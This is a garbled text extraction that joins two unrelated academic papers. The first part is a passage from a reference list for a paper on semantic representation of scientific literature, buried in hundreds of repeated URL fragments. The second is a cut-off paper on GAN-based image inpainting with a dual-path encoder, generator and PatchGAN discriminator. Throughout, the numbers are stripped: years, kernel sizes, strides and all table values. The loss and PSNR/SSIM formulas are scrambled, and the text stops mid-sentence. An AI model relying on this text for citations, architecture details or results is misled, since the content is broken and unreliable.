/html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://www.balisage.net/proceedings/vol /html/peroni /balisagevol -peroni .html http://dx.doi.org/ . /peerj-cs. groza t, handschuh s, möller k, decker s. . konnexsalt: first steps towards a semantic claim federation infrastructure. in: bechhofer s, hauswirth m, hoffmann j, koubarakis m, eds. the semantic web: research and applications, lncs, vol. . berlin, heidelberg: springer, – . groza t, möller k, handschuh s, trif d, decker s. b. salt: weaving the claim web, lecture notes in computer science, vol. . berlin, heidelberg: springer. heath t, bizer c. . linked data: evolving the web into a global data space, synthesis lectures on the semantic web: theory and technology. san rafael: morgan & claypool publishers. liakata m, saha s, dobnik s, batchelor cr, rebholz-schuhmann d. . automatic recognition of conceptualization zones in scientific articles and two life science applications. bioinformatics ( ): – doi . /bioinformatics/bts . liakata m, soldatova l. . guidelines for the annotation of general scientific concepts. technical report, aberystwyth university. jisc project report. available at http://ie-repository. jisc.ac.uk/ . liakata m, teufel s, siddharthan a, batchelor cr. . corpora for the conceptualisation and zoning of scientific papers. in: international conference on language resources and evaluation (lrec). available at http://www.lrec-conf.org/proceedings/lrec /pdf/ paper.pdf. malhotra a, younesi e, gurulingappa h, hofmann-apitius m. . ‘hypothesisfinder:’ a strategy for the detection of speculative statements in scientific text. plos computational biology ( ):e doi . /journal.pcbi. . mann wc, thompson s. . rhetorical structure theory: towards a functional theory of text organization. text ( ): – . marcu d. . a decision-based approach to rhetorical parsing. in: proceedings of the th annual meeting of the association for computational linguistics on computational linguistics. association for computational linguistics, – . mendes pn, jakob m, garcı́a-silva a, bizer c. . dbpedia spotlight: shedding light on the web of documents. in: proc. of the th international conf. on semantic systems. new york: acm, – . naak a, hage h, aimeur e. . papyres: a research paper management system. in: th ieee international conference on e-commerce technology (cec )/ th ieee international conference on enterprise computing, e-commerce and e-services (eee ). piscataway: ieee, – . peroni s. . semantic publishing: issues, solutions and new trends in scholarly publishing within the semantic web era. phd dissertation, university of bologna. rupp c, copestake a, teufel s, waldron b. . flexible interfaces in the application of language technology to an escience corpus. in: proceedings of the uk e-science programme all hands meeting (ahm ). available at http://www.allhands.org.uk/ /proceedings/papers/ .pdf. sanderson r, bradshaw s, brickley d, castro ljg, clark t, cole t, desenne p, gerber a, isaac a, jett j, habing t, haslhofer b, hellmann s, hunter j, leeds r, magliozzi a, morris b, morris p, van ossenbruggen j, soiland-reyes s, smith j, whaley d. . open annotation data model. in: w c community draft. available at http://www.openannotation.org/spec/core/. sateli b, witte r. . supporting researchers with a semantic literature management wiki. in: the th workshop on semantic publishing (sepublica ), ceur workshop proceedings, vol. . crete: anissaras. sateli b, witte r. . automatic construction of a semantic knowledge base from ceur workshop proceedings. in: semantic web evaluation challenges: semwebeval at eswc , portorož, slovenia, may –june , , revised selected papers, communications in computer and information science, vol. . berlin, heidelberg: springer, – . sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /bioinformatics/bts http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://ie-repository.jisc.ac.uk/ http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://www.lrec-conf.org/proceedings/lrec /pdf/ _paper.pdf http://dx.doi.org/ . /journal.pcbi. http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.allhands.org.uk/ /proceedings/papers/ .pdf http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://dx.doi.org/ . /peerj-cs. shotton d, portwin k, klyne g, miles a. . adventures in semantic publishing: exemplar semantic enhancements of a research article. plos computational biology ( ):e doi . /journal.pcbi. . soldatova ln, clare a, sparkes a, king rd. . an ontology for a robot scientist. bioinformatics ( ):e –e doi . /bioinformatics/btl . teufel s. . the structure of scientific articles: applications to citation indexing and summarization. stanford: center for the study of language and information. teufel s, moens m. . summarizing scientific articles: experiments with relevance and rhetorical status. computational linguistics ( ): – doi . / . teufel s, siddharthan a, batchelor cr. . towards discipline-independent argumentative zoning: evidence from chemistry and computational linguistics. in: emnlp. stroudsburg: acl, – . usbeck r, ngonga ngomo a-c, auer s, gerber d, both a. . agdistis–graph-based disambiguation of named entities using linked data. in: international semantic web conference (iswc), lncs. berlin, heidelberg: springer. weibel s, kunze j, lagoze c, wolf m. . dublin core metadata for resource discovery. internet engineering task force rfc , . available at https://www.ietf.org/rfc/rfc .txt. yosef ma, hoffart j, bordino i, spaniol m, weikum g. . aida: an online tool for accurate disambiguation of named entities in text and tables. proceedings of the vldb endowment ( ): – . sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /bioinformatics/btl http://dx.doi.org/ . / https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt http://dx.doi.org/ . /peerj-cs. semantic representation of scientific literature: bringing claims, contributions and named entities onto the linked open data cloud introduction background rhetorical entities document markup vocabularies named entity linking summary design automatic detection of rhetorical entities automatic detection of named entities semantic representation of entities implementation pre-processing the input documents rhetector: automatic detection of rhetorical entities lodtagger: named entity detection and grounding using dbpedia spotlight lodexporter: knowledge base population evaluation quantitative analysis of the populated knowledge base text mining pipeline evaluation accuracy of ne grounding with spotlight application conclusion references international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - image inpainting research based on deep learning zhao ruixia school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com zhao li school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com abstract—with the rapid development of computer technology, image inpainting has become a research hotspot in the field of deep learning. image inpainting belongs to the intersection of computer vision and computer graphics, and is an image processing technology between image editing and image generation. the proposal of generative adversarial network effectively improves the problems of poor image inpainting effect and large difference between the inpainting image and the target image, and promotes the development of image inpainting technology. in this paper, the image inpainting is based on the generation of confrontation networks. its network structure establishes two repair paths, namely the reconstruction path and the generation path, and the two paths correspond to two groups of networks. the encoder and generator in the network respectively complete the encoding and decoding tasks based on the residual network. the discriminator also uses the patch block discriminator on the basis of the residual network to discriminate the authenticity of the image. this paper uses places data set to verify the algorithm, and uses psnr and ssim two objective evaluation methods to evaluate the quality of the repaired image. experiments show that the algorithm inpainting effect is better. keywords-image inpainting; generation adversarial networks; residual network; patch with the development and popularization of computer technology, internet technology and multimedia technology, digital image processing technology has also developed rapidly. in the process of storage, transmission and use of digital image information, the phenomenon of image information damaged and loss will occur. these damaged areas affect the visual effect of the picture and the integrity of the information, and have a certain impact on the application of the picture. people urgently need a technology and method that can automatically inpainting damaged digital images, so digital image inpainting technology is born. i. introduction image inpainting is one of the most popular areas of deep learning. its basic principle is to give an image of a damaged or corroded area, and try to use the intact information of the known area of the damaged image to inpainting the damaged area of the image[ - ]. digital image inpainting methods can be divided into two major categories: traditional image inpainting methods and deep learning-based image repair methods. traditional image repair methods can be divided into: structure-based image repair technology and texture synthesis-based image inpainting technology. both image inpainting algorithms based on structure and texture can inpainting the loss of small areas such as folds. with the expansion of the missing areas, the inpainting effect gradually deteriorates. there are problems such as incomplete semantic information and blurred images in the inpainting results, which makes the image inpainting effect ineffective, ideal. the emergence of deep neural networks allows the model to obtain the understanding of image semantic information through multi-level feature extraction, and to a certain extent improves the repair effect of large-area damaged images. as deep learning shows exciting prospects in the fields of image semantic inpainting and situational awareness, and image inpainting algorithms based on deep learning can capture more advanced features of images than traditional inpainting algorithms based on structure and texture, so often used for image inpainting. at present, image inpainting based on generative adversarial networks is a major research hotspot in the field of deep learning image inpainting, which lays a solid foundation for the development of image inpainting technology. file:///e:/æ��é��/dict/ . . . /resultui/html/index.html#/javascript:; international journal of advanced network, monitoring and controls volume , no. , a. the basic idea of generating adversarial networks generative adversarial network is undoubtedly one of the popular artificial intelligence technologies, and was rated as the "top ten global breakthrough technologies" in by the mit technology review. the generative adversarial network is composed of a generative network and a discriminant network. the purpose of the generative network is to estimate the distribution of data samples from a given noise and generate synthetic data. the purpose of the discriminant network is to distinguish the input data from the generated data or the real data. the generative network and the discriminant network are a set of confrontational relationships. the source of the confrontational ideas comes from the zero-sum game in game theory. the two sides of the game use each other's strategy to change their confrontation strategy in an equal game, so as to achieve the goal of winning[ ]. it is extended to the generative antagonistic network, that is, the generative network and the discriminant network are the two sides of the game. the optimization goal is to achieve nash equilibrium[ ], the generative network tries to produce closer to real data. accordingly, the discriminant network tries to distinguish more perfectly between real data and data generated by generators. as a result, the two networks progressed in confrontation, and continued to confront each other after the progress, the data obtained by the generating network became more and more perfect, approaching the real data. b. development of deep learning models generatingsince the input of the gan generation model is random noise data, in actual applications, there are generally clear variables to control the category or other information for the data to be generated, such as generating specific numbers from to numbers. in order to solve the problem of generating labeled data, conditional generative adversarial networks are proposed, and information such as category labels and pictures are added to the input to make the image more in line with the target[ ]. the foundation of image inpainting technology based on deep learning is the convolutional neural network, which uses the convolutional neural network to extract high-dimensional features and information prediction, which makes the image inpainting technology develop rapidly[ - ]. because the network of generating model and discriminating model in gan is too simple, there will be image blur when generating large-size images. in order to generate clear images, radford a et al.[ ] proposed deep convolutional generation adversarial networks. with the emergence of several unsupervised image conversion models, such as cyclegan[ ], dualgan[ ], discogan[ ], it provides better ideas for image inpainting technology. ii. network structure image inpainting not only requires that the results conform to human visual habits, making it difficult for the human eye to detect the traces of inpainting (undetected)[ ], meanwhile inpainting the information contained in the missing pictures as much as possible, so that the restored image can be as much as possible same as the image before the damage. based on this restoration goal, this paper builds an image inpainting network framework suitable for this article by studying and analyzing the structure principles of gan. using the neural network's ability to extract high-dimensional features of images, the structural framework of this paper is built. in this paper, a parallel dual-path framework based on gan is used: one is to reconstruct the path, and use the given real image and masked image to obtain its complementary image to reconstruct the original image; the other is to generate the path and use the given masked image to inpainting. the input image of the generated path and the input image of the reconstructed path are complementary images of each other. the network structure is built on the basis of the residual network. its structure includes three parts: encoder, generating network and discriminating network. the image inpainting process in this paper is: ( )input the masked image and the complement image (the masked image and the supplementary image are the real image) into the encoders e and e of the reconstruction path and the generation path to encode; ( )the extracted two image features were fused and input into generator g and g ; ( )the generator reconstructed image and the real image are input into the discriminator d for discrimination; ( )the generated image, the fused image and the real image are input into the discriminator d for discrimination; ( )the discriminators d and d output the discriminant results and feed them back to the encoder, generator and discriminator through the back propagation algorithm to update the network parameters and train the network. the overall structure of the network is shown in figure . file:///e:/æ��é��/dict/ . . . /resultui/html/index.html#/javascript:; international journal of advanced network, monitoring and controls volume , no. , generator g generator g discriminator d discriminator d encoder e encoder e true or false true or false reconstruc tion path generation path masked image complement image coded information fusion real image reconstruction image generation image fused image figure . data flow diagram of gan a. encoder the encoder extracts the features of the image based on the residual network. the inputs of encoders e and e are three-channel images of × pixels. the residual block is composed of two layers of convolution and one layer of skip link. the first layer uses a convolution kernel of size × . the length is and the padding size is . the second layer uses a × convolution kernel with a sliding step size of and no padding. the residual structure of the encoder is shown in figure . in this paper, there are two parallel paths for image inpainting: reconstruction path and generation path. the network structure of the encoder is the same, and the combination of residual modules is used. the network structure contains residual modules. the network structure of the encoder is shown in figure . input x output f(x)+x convolution x identity map convolution figure . residual structure of the encoder residual module output image features input damaged image residual module residual module residual module residual module residual module residual module figure . encoder network structure b. generate network the generating network adopts res-net network structure, and uses the residual decoding block to decode the features extracted in the encoding stage. in the generation network, the residual block is used in the decoding stage. the residual block in the decoding stage is composed of three parts: a convolution layer, a deconvolution layer, and a skip link layer. the convolutional layer uses a convolution kernel with a international journal of advanced network, monitoring and controls volume , no. , size of × , a sliding step size of , and a padding of . the deconvolution layer uses a × convolution kernel with a sliding step size of and a padding of . after the deconvolution operation, the padding of the output image is . the skip link layer performs a deconvolution operation, using a convolution kernel with a size of × , a sliding step size of , and a fill of . after the deconvolution operation, the output image has a fill of . the generated network uses the spectral normalization method to normalize the output data. the network structure of the residual block in the decoding stage is shown in figure . a self-attention mechanism has been added to the network. the self-attention mechanism uses residual blocks and uses short+long term to ensure the consistency of the appearance of the generated image. the network structure of the generated network is shown in figure . c. the training principlediscrimination network the discrimination network adopts the structure of patchgan. the difference between patchgan and ordinary gan is that the output of ordinary gan is the evaluation of the entire image, and the output of patchgan is an n×n matrix. each element of the n×n matrix represents the original image. the larger receptive field in the map corresponds to a patch in the original picture. this paper runs a patch discriminator on the image in a convolution mode. the discriminator outputs a patch block of × size, and each element represents the probability value of the real image. this paper judges that the input of the network is a picture, the target picture is used as a positive example, and the inpainting picture is used as a negative example, so as to judge whether the inpainting picture is true. the discriminators d and d in this paper have the same network structure and use five-layer convolution. the first three layers use a × convolution kernel with a sliding step size of and a padding of ; the last two layers use a × convolution kernel with a sliding step size of and a padding of . the discriminant network first extracts the features of the input image, and then analyzes and compares the extracted features. the network structure of the discrimination network is shown in figure . input outputconvolutionconvolution deconvolution figure . decoding residual block network structure residual module residual module decode residual module decode residual module self-attention mechanism decode residual module output generated image input image feature figure . generate network structure diagram generate image real image convolution convolution convolution convolution convolution probability value international journal of advanced network, monitoring and controls volume , no. , figure . discriminant network structure diagram iii. network training in this paper, wgan-gp loss is used to optimize the network structure. wgan-gp is an improvement of wgan. a gradient penalty method is proposed to improve the continuity constraint conditions, making gan convergence more stable. the loss function of wgan-gp is composed of the loss lg of the generator and the loss ld of the discriminator. the calculation formula of generator loss can be written as           wgan d gp gp wgan d d gp l e d x e d g z l l e d x g z l l l                         ( ) where x represents a randomly selected sample in the data set and  d x represents the result output when the input of the discriminant model is a real sample. wgan d l represents the loss function corresponding to the wgan discriminator, lgp represents the gradient penalty loss function newly added in wgan-gp, and  represents the penalty coefficient. iv. experimental results and analysis a. experimental environment in order to verify the effectiveness of the algorithm proposed in this article, on the ubuntu platform, the python language and the pytorch deep learning framework are used. experiment with images of place , a public data set. the image size is × pixels, and the ratio of : is used for training and testing. b. experimental results since the image inpainting task is to repair the incomplete part of the image, the data set should be mask processed before the inpainting task. in this paper, the image preprocessing is divided into two methods: random masked and intermediate masked. after the data processing is completed, the image inpainting task is performed. the inpainting result of occlusion in the image is shown in figure . where (a) represents the damaged image, (b) represents the inpainting image, and (c) represents the real image. the inpainting result of random masked in the image is shown in figure . where (a) represents the damaged image, (b) represents the inpainting image, and (c) represents the real image. c. experimental analysis at this stage, there are mainly two kinds of image evaluation methods: subjective evaluation method and objective evaluation method. this article combines the subjective evaluation method and the objective evaluation method to evaluate the repaired image. ) subjective evaluation from the experimental results of . , it can be seen that the content of the image inpainting by this method is basically the same as the target image, the color is very similar to the target image, and direct visual observation of the image is real and natural. the inpainting of texture is natural and continuous. ) objective evaluation the objective evaluation method uses peak signal-to-noise ratio measurement (psnr) and structural similarity (ssim) to evaluate the repaired image. the higher the psnr, the less distortion in the picture inpainting process, and the better the inpainting picture. ssim measures the similarity of the two images. a higher value indicates that the two images are more similar. the maximum value is . the definition of peak signal-to-noise ratio, the expression is: )log( psnr ),(),( m se f mse g nm jiijii m i n j          )( ( ) mse is the mean square error. the default value is , ),( jii represents the pixel value at ),( ji in the real image, ),( jii represents the pixel value at ),( ji in the inpainting image, and m * n represents the area size of the inpainting image. the definition of structural similaritycan be written as ))(( ) )( ( ),( cc cc yxssim yxyx xyyx      ( ) international journal of advanced network, monitoring and controls volume , no. , x and y represent the two input images, where x  is the average of x, y  is the average of y, y  is the variance of x, y  is the variance of y, xy  is the covariance of x and y, and c , c are used to maintain a stable constant. l is the dynamic range of pixel values, generally taken as . this paper compares four different image inpainting models, using psnr and ssim methods to evaluate. (a)damaged image (b)inpainting image (c)real image figure . inpainting result of intermediate masked international journal of advanced network, monitoring and controls volume , no. , (a)damaged image (b)inpainting image (c)real image figure . inpainting result of random masked table i. evaluation results of psnr and ssim methods image inpainting model psnr ssim ce[ ] . . gl[ ] . . gntipt[ ] . . gmcnn[ ] . . ours . . international journal of advanced network, monitoring and controls volume , no. , v. conclude and prospect in this paper, the image inpainting network structure is built based on gan. the residual network is used in the encoding and decoding process to reduce the gradient disappearance and 